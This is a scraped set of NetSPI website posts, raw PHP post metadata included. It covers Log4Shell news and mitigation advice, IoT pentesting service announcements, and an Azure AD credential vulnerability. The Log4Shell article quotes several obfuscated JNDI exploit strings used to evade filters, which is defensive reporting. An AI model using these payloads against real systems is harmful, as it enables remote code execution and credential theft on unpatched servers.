According to Microsoft researchers, beyond coin-miners, they’ve also seen installations of Cobalt Strike, which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.

Also, it could get a lot worse. Cybersecurity researchers at Check Point warned on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.

“Since Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,” they said.

The flaw, which is uber-easy to exploit, has been named Log4Shell. It’s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world’s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.

Mutations May Enable Exploits to Slip Past Protections

On Monday, Check Point reported that Log4Shell’s new, malignant offspring can now be exploited “either over HTTP or HTTPS (the encrypted version of browsing),” they said.

The more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. “It means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,” they wrote.

Because of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 Shellshock family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.

Tactical Shifts

Besides variations that can slip past protections, researchers are also seeing new tactics.

Luke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to “bingsearchlib[.]com,” with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.

But since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there’s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.

“This originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,” Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.

He offered these examples:

${jndi:${lower:l}${lower:d}a${lower:p}://world80
${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//
${jndi:dns://

…All of which achieve the same objective: “to download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,” Richards said.

Bug Has Been Targeted All Month

Attackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.

On Sunday, Sophos researchers said that they’d “already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,” noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.

“Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince tweeted on Saturday. “That suggests it was in the wild at least nine days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.”

On Sunday, Cisco Talos chimed in with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. “It is recommended that organizations expand their hunt for scanning and exploit activity to this date,” it advised.

Exploits Attempted on 40% of Corporate Networks

Check Point said on Monday that it’s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it’s seen more than 100 attempts to exploit the vulnerability per minute.

As of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.

The map below illustrates the top targeted geographies.

Top affected geographies. Source: Check Point.

Hyperbole isn’t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: “It wouldn’t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,” Dali noted via email on Monday. “Connecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren’t taken right away.”

As has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability “is relatively easy to exploit, and we’ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,” Dali reiterated. “Hopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.”

This situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we’ve seen, along with some of the new protections and detection tools.

More News

New Protections, Detection Tools

  • On Saturday, Huntress Labs released a tool – available here – to help organizations test whether their applications are vulnerable to CVE-2021-44228.
  • Cybereason released Logout4Shell, a “vaccine” for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.

Growing List of Affected Manufacturers, Components

As of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list hosted on GitHub that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they’re affected by Log4Shell and provides links to evidence if they are.

Spoiler alert: Most are, including:

A Deep Dive and Other Resources

  • Immersive Labs has posted a hands-on lab of the incident.
  • Lacework has published a blog post regarding how the news affects security best practices at the developer level.
  • NetSPI has published a blog post that includes details on Log4Shell’s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.
[post_title] => Threatpost: Log4Shell Is Spawning Even Nastier Mutations [post_excerpt] => On December 13, 2021, NetSPI was featured in an article written by Lisa Vaas for Threatpost. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => threatpost-log4shell-is-spawning-even-nastier-mutations [to_ping] => [pinged] => [post_modified] => 2021-12-15 22:02:36 [post_modified_gmt] => 2021-12-16 04:02:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26964 [menu_order] => 102 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 26924 [post_author] => 91 [post_date] => 2021-12-10 17:01:28 [post_date_gmt] => 2021-12-10 23:01:28 [post_content] =>

Talk to any security professional and they’ll tell you that a vulnerability that allows for unauthenticated remote code execution is as about as critical as it gets. That’s exactly what CVE-2021-44228 allows.

On December 9, 2021, the severe Apache Log4j zero-day vulnerability was disclosed, along with its known exploits, creating a panic across the security community. The mere fact that a fix was put into place in a matter of hours of discovery is an indicator of how severe the vulnerability truly is. Given its severity, users are encouraged to take action immediately.

As teams scrambled to address CVE-2021-44228, a new vulnerability came about: CVE 2021-45046, as the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was deemed "incomplete in certain non-default configurations." It causes Log4j2 Thread Context Message Pattern and Context Lookup Pattern to be vulnerable to a Denial of Service (DoS) attack.

…And then yet another surfaced overnight, CVE-2021-45105. The third Log4j vulnerability is very similar to the initial Log4Shell zero-day. Previous patches did not protect against uncontrolled recursion from self-referential lookups which could also result in a DoS attack.

Continue reading for details on the impact of these critical vulnerabilities, guidance to determine whether your organization is at risk of Log4j exploit, and mitigation recommendations.

What is the impact of the Log4Shell zero-day vulnerability?

The ubiquity of Log4j is the greatest concern. In just 24 hours, it has been reported that Apple iCloud, Twitter, Cloudflare, Minecraft, and Steam, identified the vulnerability in their systems.

Its impact is expected to spread even further given Log4j is widely used across enterprise applications, including mobile applications, thick client applications, web applications, desktop GUI applications, and other Java-based applications to record/log activities within an application.

If exploited, cybercriminals can take control of an affected system remotely.

Is my organization vulnerable?

The first step to threat mitigation is to understand Log4j’s presence in your organization. To answer the question “Which of my applications use Log4j?” NetSPI recommends:

  • Searching code repositories for the following and setting them to the correct parameter value based on the CVE remediation
    recommendation.
    • "log4j2.formatMsgNoLookups"
    • "com.sun.jndi.rmi.object.trustURLCodebase"
    • "com.sun.jndi.cosnaming.object.trustURLCodebase"
For additional detection tips, download our tip sheet, 5 Strategies for Log4j Vulnerability Identification
  • Check your asset management database to see if you are running Apache Log4j2 versions ranging from 2.0 to 2.16 in your environment. If so, you are likely vulnerable and require an update, though there are some exceptions.
  • Check for affected versions of log4j jar files on file systems to prioritize systems that require further analysis.
  • If a software composition analysis (SCA) tool is being used, request the tool to develop a check for the vulnerability or create a custom check for the incorrect setting.

What can I do to protect my organization?

Review the Apache Log4j security vulnerability announcement and update to the appropriate version of Log4j 2. It is important to follow the mitigation steps outlined by Apache and continuously check in for additional vulnerable instances.

NetSPI also recommends organizations ensure their detection tools (Qualys, Nessus, Nexpose, etc.) produce checks for the vulnerability as this is likely to have lasting impacts.

If you have questions about the Log4j vulnerabilities or would like NetSPI to perform a targeted test for the vulnerability in your environment, please visit https://www.netspi.com/security-testing/apache-log4j-assessment.

[post_title] => Log4j: Is My Organization Impacted? [post_excerpt] => Find out if your organization is vulnerable to the Log4j vulnerabilities, read about the impact of CVE-2021-44228 and its variants, and learn mitigation steps to take. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => log4j-vulnerability-impact [to_ping] => [pinged] => [post_modified] => 2021-12-23 09:35:13 [post_modified_gmt] => 2021-12-23 15:35:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26924 [menu_order] => 103 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 26938 [post_author] => 91 [post_date] => 2021-12-10 10:42:37 [post_date_gmt] => 2021-12-10 16:42:37 [post_content] =>

On December 10, 2021, NetSPI was featured in an article written by Help Net Security. Read the full article below or online here.

+++

NetSPI launched its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities.

NetSPI IoT penetration testing

With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.

NetSPI’s new IoT testing services encompass the following capabilities:

  • ATM penetration testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture.
  • Automotive penetration testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems – at any stage of automotive development.
  • Medical device penetration testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines.
  • Operational technology (OT) architecture and security review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation.
  • Embedded penetration testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device.

“IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI’s IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems,” said Aaron Shilts, President and CEO at NetSPI. “Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide.”

To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.

“IoT pentesting has become an important part of security strategy and business processes – especially given the increased connectedness in both personal and professional lives,” said Trowell. “There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI’s new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers.”

[post_title] => Help Net Security: NetSPI offers protection against cybersecurity threats with IoT penetration testing services [post_excerpt] => On December 10, 2021, NetSPI was featured in an article written by Help Net Security. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-netspi-iot-penetration-testing [to_ping] => [pinged] => [post_modified] => 2021-12-13 17:00:37 [post_modified_gmt] => 2021-12-13 23:00:37 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26938 [menu_order] => 104 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [23] => WP_Post Object ( [ID] => 26936 [post_author] => 91 [post_date] => 2021-12-08 10:08:00 [post_date_gmt] => 2021-12-08 16:08:00 [post_content] =>

On December 8, 2021, NetSPI was featured in an article written by David Marshall for VMBlog.com. Read the full article below or online here.

+++

NetSPI announced the launch of its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities. With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks.

NetSPI's new IoT testing services encompass the following capabilities: 

  • ATM Penetration Testing. Identify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture. 
    Learn more about ATM pentesting.
  • Automotive Penetration Testing. Identify security issues on relevant vehicles and provide recommendations to improve the current systems - at any stage of automotive development. 
    Learn more about automotive pentesting.
  • Medical Device Penetration Testing. Through a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines. 
    Learn more about medical device pentesting.
  • Operational Technology (OT) Architecture and Security Review. Identify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation. 
    Learn more about OT architecture and security review.
  • Embedded Penetration Testing. Identify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device. 
    Learn more about embedded pentesting.

"IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI's IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems," said Aaron Shilts, President and CEO at NetSPI. "Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide."

To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice. 

"IoT pentesting has become an important part of security strategy and business processes - especially given the increased connectedness in both personal and professional lives," said Trowell. "There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI's new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers."

[post_title] => VMBlog.com: NetSPI Adds IoT Penetration Testing to its Suite of Offensive Security Services [post_excerpt] => On December 8, 2021, NetSPI was featured in an article written by David Marshall for VMBlog.com. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => vmblog-netspi-adds-iot-penetration-testing-to-its-suite-of-offensive-security-services [to_ping] => [pinged] => [post_modified] => 2021-12-13 17:01:37 [post_modified_gmt] => 2021-12-13 23:01:37 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26936 [menu_order] => 105 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [24] => WP_Post Object ( [ID] => 26848 [post_author] => 91 [post_date] => 2021-12-08 07:00:00 [post_date_gmt] => 2021-12-08 13:00:00 [post_content] =>
Led by IoT security expert Larry Trowell, the IoT pentesting services focus on securing ATMs, automotive, medical devices, operational technology, and other embedded systems.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of its IoT penetration testing services, which will be added to its existing suite of penetration, adversary simulation, and attack surface management capabilities. With the stark growth of IoT adoption over the past few years, pentesting is now a critical asset for companies to understand and assess the overall strength and accountability of their internet-connected systems against sophisticated and targeted cyber attacks. 

NetSPI’s new IoT testing services encompass the following capabilities:  

  • ATM Penetration TestingIdentify the security issues and common vulnerabilities on relevant ATM systems and provide actionable recommendations for improving the overall security posture. Learn more about ATM pentesting.
  • Automotive Penetration TestingIdentify security issues on relevant vehicles and provide recommendations to improve the current systems – at any stage of automotive development. Learn more about automotive pentesting.
  • Medical Device Penetration TestingThrough a combination of threat modeling and penetration testing, determine possible medical device security risks and identify whether devices meet or exceed the current standards and recommendations by the FDA Premarket Cybersecurity Guidelines. Learn more about medical device pentesting.
  • Operational Technology (OT) Architecture and Security ReviewIdentify industrial control system (ICS) vulnerabilities with a focus on the OT processes in a Defense in Depth strategy. NetSPI will investigate the configuration and architecture of the systems and help address issues with asset inventory, network configuration, and segmentation. Learn more about OT architecture and security review.
  • Embedded Penetration TestingIdentify embedded system vulnerabilities in a multitiered penetration test across multiple disciplines. Look for security gaps at all stages of embedded development that may affect each layer of the device. Learn more about embedded pentesting. 

“IoT has become part of our daily lives, but these devices and systems are often overlooked from a security perspective. Tapping into our innovation-driven culture and our best-in-class technologies, NetSPI’s IoT pentesting team is uniquely qualified to find and help fix the most critical security gaps in these systems," said Aaron Shilts, President and CEO at NetSPI. "Our team is currently gearing up for game changing IoT pentesting projects in 2022. We were selected to test smart city technologies and ATM networks for some of the most transformative organizations in the world. NetSPI is thrilled to be a prominent player in future-proofing IoT security worldwide." 

To keep up with the growth of IoT and assist with the complexity in this space, NetSPI has brought on one of the foremost IoT security experts, Larry Trowell, as Principal Consultant to provide additional leadership, guidance, and accountability within the IoT security practice.  

“IoT pentesting has become an important part of security strategy and business processes – especially given the increased connectedness in both personal and professional lives,” said Trowell. “There is currently a gap in the market to effectively monitor and assess the risks of these devices. NetSPI’s new offering allows our team to devote its resources and ensure the security of all embedded devices for our customers.” 

To learn more about NetSPI’s IoT security capabilities, visit the NetSPI website.  

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com 
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com 
(978) 201-2510

[post_title] => NetSPI Adds IoT Penetration Testing to its Suite of Offensive Security Services [post_excerpt] => Learn about NetSPI’s IoT security services, including ATM, automotive, medical devices, operational technology (OT), and embedded system penetration testing services. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-adds-iot-penetration-testing-offensive-security-services [to_ping] => [pinged] => [post_modified] => 2021-12-08 08:37:15 [post_modified_gmt] => 2021-12-08 14:37:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26848 [menu_order] => 108 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [25] => WP_Post Object ( [ID] => 26751 [post_author] => 91 [post_date] => 2021-11-30 07:00:15 [post_date_gmt] => 2021-11-30 13:00:15 [post_content] =>
Co-authored by two of the world’s foremost experts on Azure cybersecurity, the book explores how to perform successful pentesting and risk assessment of Microsoft Azure environments.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the launch of Penetration Testing Azure for Ethical Hackersa book co-authored by NetSPI practice director Karl Fosaaen and global cloud security consultant David Okeyode. Written to provide security professionals hands-on lessons and tips for successful Azure penetration testing, the book serves as a resource for industry professionals to simulate real-world Azure attacks and learn how to better identify vulnerabilities.  

To keep sensitive data secure as businesses migrate from on-premise environments to the cloud, pentesting has become a necessity for all organizations operating in Microsoft Azure. This investment ensures that organizations have consistent visibility into security gaps in cloud infrastructures, and provides actionable guidance to remediate vulnerabilities and improve organizations’ overall cloud security posture. 

“The cloud is top of mind for nearly all of today’s security professionals and will continue to be a vital aspect to IT spend,” said author Karl Fosaaen, practice director at NetSPI. “This book provides a digestible framework for professionals of all levels to better understand pentesting within Azure environments. It offers hands-on exercises for readers to test their skills and learn key pentesting techniques that are crucial to successfully assess Azure environments in today’s ecosystem.”  

Penetration Testing Azure for Ethical Hackers takes readers through the prerequisites for Azure penetration testing, while also giving step-by-step instructions on how to set up a pentesting lab. Readers will also learn how to simulate an attack on Azure assets –– demonstrating the techniques and methodologies an attacker uses to gain persistent access to cloud environments. 

“With the rapid acceleration to cloud-based environments and increased gaps in Azure security implementations, penetration testing is becoming an increasingly important skill for security professionals to utilize,” said David Okeyode, co-author and EMEA chief technology officer, Azure Cloud at Palo Alto Networks. “IT teams will come to understand how hackers attack resources hosted within Azure, learn how to effectively protect their environments from these threats, and extend their current pentesting skill sets and capabilities.” 

Order Penetration Testing Azure for Ethical Hackers now on Amazon. To learn more about NetSPI’s Azure cloud penetration testing capabilities, visit the NetSPI website

To see Azure penetration testing techniques in action, read our technical blog detailing Karl’s latest Microsoft Azure cloud vulnerability finding: CVE-2021-42306.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI 
victoria.norris@netspi.com 
(630) 258-0277 

Amanda Echavarri, Inkhouse for NetSPI 
netspi@inkhouse.com 
(978) 201-2510

[post_title] => NetSPI Practice Director Publishes Azure Penetration Testing Book for Ethical Hackers [post_excerpt] => Learn about Azure cloud penetration testing in this book written by NetSPI practice director Karl Fosaaen. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-karl-fosaaen-publishes-azure-penetration-testing-book [to_ping] => [pinged] => [post_modified] => 2021-11-29 18:27:57 [post_modified_gmt] => 2021-11-30 00:27:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26751 [menu_order] => 113 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [26] => WP_Post Object ( [ID] => 26705 [post_author] => 91 [post_date] => 2021-11-18 12:30:11 [post_date_gmt] => 2021-11-18 18:30:11 [post_content] =>

On November 18, 2021, NetSPI was featured in an article written by Ionut Arghire for SecurityWeek. Read the full article below or online here.

Microsoft on Wednesday informed customers about a recently patched information disclosure vulnerability affecting Azure Active Directory (AD).

Tracked as CVE-2021-42306 (CVSS score of 8.1), the vulnerability exists because of the manner in which Automation Account “Run as” credentials are created when a new Automation Account is set up in Azure.

Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and could be accessed by anyone with access to information on App Registrations. An attacker could use these credentials to authenticate as the App Registration.

Security researchers with enterprise penetration testing firm NetSPI, who identified the vulnerability, explain that an attacker could leverage the bug to escalate privileges to Contributor of any subscription that has an Automation Account, and access resources in the affected subscriptions.

“This includes credentials stored in key vaults and any sensitive information stored in Azure services used in the subscription. Or worse, they could disable or delete resources and take entire Azure tenants offline,” the researchers explain.

According to Microsoft, the vulnerability is related to the keyCredentials property, which was designed for configuring authentication credentials for applications, and which accepts a certificate containing public key data for authentication, but which also incorrectly stored such certificates.

“Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data,” Microsoft says.

The tech giant says it has addressed the bug by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been incorrectly stored in clear text.

“As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property,” the company says.

Microsoft also notes that all Automation Run As accounts that have been created using Azure Automation self-signed certificates between October 15, 2020, and October 15, 2021, are affected by the issue. Azure Migrate services and customers who deployed the preview version of VMware to Azure DR experience with Azure Site Recovery (ASR) might also be affected.

Thus, Azure AD customers should cycle through all Automation Account “Run as” certificates to make sure no credentials are exposed.

[post_title] => SecurityWeek: Microsoft Informs Users of High-Severity Vulnerability in Azure AD [post_excerpt] => On November 18, 2021, NetSPI was featured in an article written by Ionut Arghire for SecurityWeek. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securityweek-microsoft-informs-users-of-high-severity-vulnerability-in-azure-ad [to_ping] => [pinged] => [post_modified] => 2021-11-18 12:30:27 [post_modified_gmt] => 2021-11-18 18:30:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26705 [menu_order] => 121 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [27] => WP_Post Object ( [ID] => 26697 [post_author] => 91 [post_date] => 2021-11-17 14:11:54 [post_date_gmt] => 2021-11-17 20:11:54 [post_content] =>
The vulnerability, found by NetSPI’s cloud pentesting practice director Karl Fosaaen, affects most organizations that use Azure.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today recognizes the work of practice director Karl Fosaaen who discovered and reported a critical misconfiguration in Microsoft Azure. If exploited by an adversary, CVE-2021-42306: CredManifest would allow bad actors to escalate up to a Contributor role in the Azure Active Directory subscription. If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription.

Because Azure Active Directory enables employees to sign in and access resources, if the issue was not identified by NetSPI and a malicious individual found the vulnerability first, they would have the potential to access all of the resources in the affected subscriptions. This includes credentials stored in key vaults and any sensitive information stored in Azure services used in the subscription. Or worse, they could disable or delete resources and take entire Azure tenants offline. This would leave organizations without access to external resources that are hosted in the vulnerable subscription, including applications hosted by App services, public files from Storage Accounts, or databases hosted in AzureSQL.

“The scope of this issue is wide-sweeping, given the prominence of “Run as” accounts in Azure and the growing adoption of Azure. We’re proud to have identified and fixed it before the bad guys,” said Fosaaen. “The discovery of this vulnerability highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test.” 

Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. You can read Microsoft’s disclosure blog post online here.

“We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe,” said a representative from MSRC. Impacted Azure services have deployed updates that prevent clear text private key data from being stored during application creation. Additionally, Azure Active Directory deployed an update that prevents access to private key data previously stored. Customers will be notified via Azure Service Health and should perform the mitigation steps specified in the notification to remediate any confirmed impacted Application and/or Service Principal. 

Although Microsoft has updated the impacted Azure services, NetSPI recommends cycling any existing Automation Account "Run as" certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised. 

A technical explanation of the vulnerability, how it was found, its impact, and remediation steps, can be found on the NetSPI technical blog. To connect with NetSPI for Azure cloud penetration services, visit NetSPI.com.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Media Contact:
Amanda Echavarri, Inkhouse for NetSPI
netspi@inkhouse.com
(978) 201-2510 

[post_title] => NetSPI Uncovers a Critical Azure Vulnerability, CVE-2021-42306: CredManifest [post_excerpt] => Learn about CVE-2021-42306: CredManifest and how it impacts organizations leveraging Microsoft Azure services. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-uncovers-critical-azure-vulnerability-credmanifest [to_ping] => [pinged] => [post_modified] => 2021-11-17 14:11:55 [post_modified_gmt] => 2021-11-17 20:11:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26697 [menu_order] => 122 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [28] => WP_Post Object ( [ID] => 26594 [post_author] => 91 [post_date] => 2021-10-27 14:14:21 [post_date_gmt] => 2021-10-27 19:14:21 [post_content] =>

Dubai, UAE and Minneapolis, Minnesota  –  SecureLink, the Trusted Risk Advisor and subsidiary of StarLink signed distribution agreement with NetSPI, a leader in Enterprise Security Testing and Attack Surface Management, for the MEA region.

Pioneers in penetration testing, NetSPI is changing the pentesting scenario to make it easier for enterprises to track trends and improve their vulnerability management program. The Technical Assessments include Web Application Penetration Testing, Mobile Application Penetration Testing, Source Code Review, Infrastructure Vulnerability Assessment, Red Teaming, and Breach and Attack Simulation.

Through this partnership, NetSPI can capitalize on SecureLink’s consultancy, sales, and marketing expertise, utilize the direct connect with decision-makers in their extensive customer base to create and convert opportunities for Cybersecurity Testing Services provided by NetSPI as well as take advantage of the years of trust built by SecureLink in this region.

Manish Pardeshi, Director, SecureLink commented that, “We are privileged to onboard NetSPI in our ecosystem that can offer our customers a more continuous and scalable assessment of their environment with NetSPI’s Penetration Testing as a Service (PTaaS) and ensure real-time visibility and full control over the testing program.”

"We are proud to announce our partnership with SecureLink, the well-established cybersecurity leader in the MEA region. Together we will transform the cybersecurity testing industry with NetSPI’s technology-enabled services and expertise," said Aaron Shilts President and CEO at NetSPI. "In partnership with SecureLink, multinational enterprises in MEA now have access to NetSPI’s penetration testing and adversary simulation services to test their applications, networks, and cloud at scale and better manage their expanding attack surface. The sophistication, methodology, and value, provided by SecureLink and NetSPI is unmatched."

About SecureLink

